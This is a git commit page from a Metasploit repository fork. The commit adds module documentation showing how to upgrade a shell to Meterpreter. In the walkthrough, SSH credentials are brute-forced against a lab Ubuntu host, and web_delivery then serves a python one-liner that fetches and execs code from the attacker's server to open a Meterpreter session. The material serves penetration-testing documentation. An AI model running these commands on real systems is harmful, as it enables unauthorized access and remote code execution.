adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add shell to meterpreter upgrade example

Browse Source
This commit is contained in:
h00die
2017-03-05 20:10:26 -05:00
parent 4317aa10e1
commit dfd492611c
1 changed files with 52 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/multi/script/web_delivery.md
+52
View File
@@ -75,6 +75,58 @@ Here's how that can be done:
2. Interact with the shell, and copy/paste the command.
3. You should get a Meterpreter session.
An example of this process can be seen below where an Ubuntu 14.04 victim is first exploited through `auxialiary/scanner/ssh/ssh_login`, and then upgraded via `web_delivery`.
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login) > set password ubuntu
password => ubuntu
msf auxiliary(ssh_login) > run
[*] SSH - Starting bruteforce
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.117:35219 -> 192.168.2.156:22) at 2017-03-05 19:57:53 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using URL: http://0.0.0.0:8080/DovbvqRaB
[*] Local IP: http://192.168.2.117:8080/DovbvqRaB
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/DovbvqRaB'); exec(r.read());"
msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...
python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/DovbvqRaB'); exec(r.read());"
[*] 192.168.2.156 web_delivery - Delivering Payload
[*] Sending stage (38500 bytes) to 192.168.2.156
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:35840) at 2017-03-05 19:59:44 -0500
^Z
Background session 1? [y/N] y
msf exploit(web_delivery) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : Ubuntu14
OS : Linux 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
## Vulnerable Pages
### Perl cgi